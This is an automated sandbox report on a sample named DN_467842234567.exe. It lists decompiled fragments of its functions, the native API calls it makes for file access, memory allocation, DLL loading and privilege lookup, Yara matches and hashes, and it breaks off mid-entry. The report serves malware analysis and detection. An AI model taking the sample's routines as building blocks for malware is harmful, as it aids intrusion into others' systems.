                                            Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                            0x0040581f
                                            0x00405821
                                            0x00405849
                                            0x0040582e
                                            0x00405833
                                            0x0040583e
                                            0x00000000
                                            0x0040585b
                                            0x00405847
                                            0x00405847
                                            0x00000000

                                            APIs
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.673543535.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.673520400.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673600080.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673619579.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673702883.0000000000420000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673724018.000000000042C000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673812277.0000000000434000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.673834659.0000000000437000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                            • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                            • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: DN_467842234567.exe PID: 6416 Parent PID: 1088 DN_467842234567.exeCOMMON

                                            Executed Functions

                                            Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E004191D0(_t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}





                                            0x00418683
                                            0x0041868f
                                            0x00418697
                                            0x0041869c
                                            0x004186a2
                                            0x004186bd
                                            0x004186c5
                                            0x004186c9

                                            APIs
                                            • NtReadFile.NTDLL(b=A,5E972F61,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F61,00413D62,?,00000000), ref: 004186C5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: !:A$b=A$b=A
                                            • API String ID: 2738559852-704622139
                                            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                            • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                            • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                            • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 24dc7cba470f64ef4f6d9ec48576e6a632dc7bf3e35dab656aac36529f605b52
                                            • Instruction ID: 557b2eb1d6d5e6d7ceb3fcad695dbb87121010f209d569e82d100cb628bdb125
                                            • Opcode Fuzzy Hash: 24dc7cba470f64ef4f6d9ec48576e6a632dc7bf3e35dab656aac36529f605b52
                                            • Instruction Fuzzy Hash: 9201EFB2241208ABCB08CF88CC95EEB37A9AF8C354F058248FA0993241C630E850CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: dfd46b6c6249f8e4b93d884fb6876f4e1786a68fe9c5d80b1a2388a39c242d59
                                            • Instruction ID: 841c912e16e37b3ad3dc53ecd75c2e42b9d833a8d3c810980ad9a238fc5b03d7
                                            • Opcode Fuzzy Hash: dfd46b6c6249f8e4b93d884fb6876f4e1786a68fe9c5d80b1a2388a39c242d59
                                            • Instruction Fuzzy Hash: EFF03A76200115ABD714EF98DC85EEB77A9EF88310F248559FA589B241C630E9518BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b39814a7d92d148ec075b424fc63a4a7af579ead9b5a4d017c79b3e9bf4c8f95
                                            • Instruction ID: 79e95b9563a87a94a6f8b015792a8f3cd2dbdb1c4dab89d2058c8bd2ff1d2eaa
                                            • Opcode Fuzzy Hash: b39814a7d92d148ec075b424fc63a4a7af579ead9b5a4d017c79b3e9bf4c8f95
                                            • Instruction Fuzzy Hash: 7CF012B22001196FDB14DF95CC95EEB77ADAF88344F15414DFD199B242C630E811CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418622, Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 6199db05111b063147845b11c5b95b231fcacf6ab4630b372ac588693a095863
                                            • Instruction ID: ea02753682b2937f9cd6809faa274be8e7045e69e0cbc3df04eec8951b8a1737
                                            • Opcode Fuzzy Hash: 6199db05111b063147845b11c5b95b231fcacf6ab4630b372ac588693a095863
                                            • Instruction Fuzzy Hash: 6EE0E2B2214005AFDB08CF88E844CE7B3F9EF88310B20854EF54D83100D630A891CBB8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f7afb791c7e106f2ebe574cac63ddc8836eb52a04bb69c86e2e2eabad70acbca
                                            • Instruction ID: c4ff2768c52512e797fc52d98a0787308aa68142aa74d0e06de383dbb7879f39
                                            • Opcode Fuzzy Hash: f7afb791c7e106f2ebe574cac63ddc8836eb52a04bb69c86e2e2eabad70acbca
                                            • Instruction Fuzzy Hash: E590026265100502D20171594404616404AD7D0381F95C077A1414565EDA6589A2F171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 88c4483c27ddf84a668c59f0e5b18e9fac0e6caf0c8325370e14e5f487fc5538
                                            • Instruction ID: 294b0b39b81110322923727ef215f9ffdfef5ff80384647ef5a0440367b100ee
                                            • Opcode Fuzzy Hash: 88c4483c27ddf84a668c59f0e5b18e9fac0e6caf0c8325370e14e5f487fc5538
                                            • Instruction Fuzzy Hash: AC90027225100413D211615945047074049D7D0381F95C467A0814568DA6968962F161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 6e3b547389833efa6879e8ff2c2705f3d2a829db8aeb13f80f71288d07b16090
                                            • Instruction ID: f55aecdc2d03696a321ee758606eea3c0cb25825194ff0ee4c432b7dc2597e71
                                            • Opcode Fuzzy Hash: 6e3b547389833efa6879e8ff2c2705f3d2a829db8aeb13f80f71288d07b16090
                                            • Instruction Fuzzy Hash: 94900262292041525645B15944045078046E7E0381B95C067A1804960C95669866E661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 64bb7cf9ded96a0b5ef7121331df7fca2ac109d6a630f838122d2216e55cba2f
                                            • Instruction ID: afe217c8f2219be0e8ae0a2b56cadabc0756f15b22791d5a12d7b1aea256020c
                                            • Opcode Fuzzy Hash: 64bb7cf9ded96a0b5ef7121331df7fca2ac109d6a630f838122d2216e55cba2f
                                            • Instruction Fuzzy Hash: 239002A239100442D20061594414B064045D7E1341F55C06AE1454564D9659CC62B166
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: faf2ace88a97e573d7c2811d4586c8e7f623d17c1b468475a9adf7510dec71df
                                            • Instruction ID: 659877cb16e9913adf2d8b16d1c61669029eb811df4a933cbf8a86de383c3c5d
                                            • Opcode Fuzzy Hash: faf2ace88a97e573d7c2811d4586c8e7f623d17c1b468475a9adf7510dec71df
                                            • Instruction Fuzzy Hash: EB9002A225200003420571594414616804AD7E0341F55C076E14045A0DD56588A1B165
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b1fc357baa5df7931375e5e252955d536c6a870b78b087e71678a36b0bf9d997
                                            • Instruction ID: 732c96e33de6ca7d53845787b67a31f94457c6cb2c6edc1e626f823079bed769
                                            • Opcode Fuzzy Hash: b1fc357baa5df7931375e5e252955d536c6a870b78b087e71678a36b0bf9d997
                                            • Instruction Fuzzy Hash: 749002B225100402D240715944047464045D7D0341F55C066A5454564E96998DE5B6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f98a9ca4b4375cc558ed879cc446345f19d5d8d7a495d69a057fe54f7da068c7
                                            • Instruction ID: 5fbe54261e188be3232b6ed5544bb5bdd7ba9b377264ad914d932b2477ff3097
                                            • Opcode Fuzzy Hash: f98a9ca4b4375cc558ed879cc446345f19d5d8d7a495d69a057fe54f7da068c7
                                            • Instruction Fuzzy Hash: 43900266261000030205A55907045074086D7D5391755C076F1405560CE6618871A161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e69524928857ee67ea1b9a89dfc66fcc66a7b23c5f497920501ecfa22f499b6f
                                            • Instruction ID: 1109f809e7b2c349c2f1a2f61e59547191ae036c5a75391cdd65e65c8e3c2d04
                                            • Opcode Fuzzy Hash: e69524928857ee67ea1b9a89dfc66fcc66a7b23c5f497920501ecfa22f499b6f
                                            • Instruction Fuzzy Hash: 0390027225108802D2106159840474A4045D7D0341F59C466A4814668D96D588A1B161
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9f5218504a64d67380e7144ea90921573be43d500c476bd6b8792a0e845d324b
                                            • Instruction ID: 08a1c9a6cb5fad0a86e94be010454509cedf48cbdc54284ef8ea7075c8d07bc1
                                            • Opcode Fuzzy Hash: 9f5218504a64d67380e7144ea90921573be43d500c476bd6b8792a0e845d324b
                                            • Instruction Fuzzy Hash: BC900262651000424240716988449068045FBE1351B55C176A0D88560D95998875A6A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 91c512ae0f75ab80b864ddcde361fa426b7d7cee1d59d1b6339cde700e24f1f1
                                            • Instruction ID: a93c92e0b8b864c955fc11758b917a0f422c359b4a37e7b3957afa992325f7f5
                                            • Opcode Fuzzy Hash: 91c512ae0f75ab80b864ddcde361fa426b7d7cee1d59d1b6339cde700e24f1f1
                                            • Instruction Fuzzy Hash: 6490027225140402D2006159481470B4045D7D0342F55C066A1554565D96658861B5B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: bd8f6656fc6bdff42f9dc78b4d9acc6258473738aff3eee87320c45784cedffa
                                            • Instruction ID: 881de06becd4ddf3f6b209c92f65eaca4737e5f104eb9fc347890d2693e76696
                                            • Opcode Fuzzy Hash: bd8f6656fc6bdff42f9dc78b4d9acc6258473738aff3eee87320c45784cedffa
                                            • Instruction Fuzzy Hash: 9390027225100802D2807159440464A4045D7D1341F95C06AA0415664DDA558A69B7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a54c434ba662cf39f90d9ad88482a3d7604eea249c837245d548f976fd103d80
                                            • Instruction ID: 1a0363723a7231711bd3d2da186631bdc03f01597fe895ade55dc692b8876262
                                            • Opcode Fuzzy Hash: a54c434ba662cf39f90d9ad88482a3d7604eea249c837245d548f976fd103d80
                                            • Instruction Fuzzy Hash: E490026226180042D30065694C14B074045D7D0343F55C16AA0544564CD9558871A561
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4eb01e3a81a73a2ea706ba31a8a890000b3479bc7fd8f8c155ee17f7ddfac2a9
                                            • Instruction ID: e0b308dba6184dca1e5eca2bb8ef42ce286447129003b1b2bd5bbc33791aacd4
                                            • Opcode Fuzzy Hash: 4eb01e3a81a73a2ea706ba31a8a890000b3479bc7fd8f8c155ee17f7ddfac2a9
                                            • Instruction Fuzzy Hash: 9890026235100003D240715954186068045E7E1341F55D066E0804564CE9558866A262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e2f07f1676dc98c4d8639222e69ea10bebac4b791d4526f020b6b2371f383d09
                                            • Instruction ID: bfa249105d42580859eb385f6562c14a53dec4530ab02bf7cab328a3df7c9734
                                            • Opcode Fuzzy Hash: e2f07f1676dc98c4d8639222e69ea10bebac4b791d4526f020b6b2371f383d09
                                            • Instruction Fuzzy Hash: B190026A26300002D2807159540860A4045D7D1342F95D46AA0405568CD9558879A361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 4d6b893854a01170f0732319377cf2371032c9a885690af45542467a6627176e
                                            • Instruction ID: 6ea0df29ab20a47736aa62ace6a10592b1fe2789482212d3886d3a3a715e869d
                                            • Opcode Fuzzy Hash: 4d6b893854a01170f0732319377cf2371032c9a885690af45542467a6627176e
                                            • Instruction Fuzzy Hash: 8990027236114402D210615984047064045D7D1341F55C466A0C14568D96D588A1B162
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00BC9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1f60002670f0fb381f8444c8594acc010e403f6e6e73b550a300f4c452e307b0
                                            • Instruction ID: d39d9d0b39fe3bf6294c45ca014a3e90c1e452e5885680dac5f0ae963171a55f
                                            • Opcode Fuzzy Hash: 1f60002670f0fb381f8444c8594acc010e403f6e6e73b550a300f4c452e307b0
                                            • Instruction Fuzzy Hash: A590027225100402D200659954086464045D7E0341F55D066A5414565ED6A588A1B171
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                            • Instruction ID: 8d10d9d25de9ec3e6def201a299ec9bf42c948c309616648182b8fd41abd7787
                                            • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                            • Instruction Fuzzy Hash: 54212BB2D442085BCB11E6609D42BFF736C9B54304F04017FE989A2181FA38AB498BA7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;

				E004191D0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}




                                            0x004188b7
                                            0x004188c2
                                            0x004188cd
                                            0x004188d1

                                            APIs
                                            • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: &5A
                                            • API String ID: 1279760036-1617645808
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004189E5, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                            Memory Dump Source
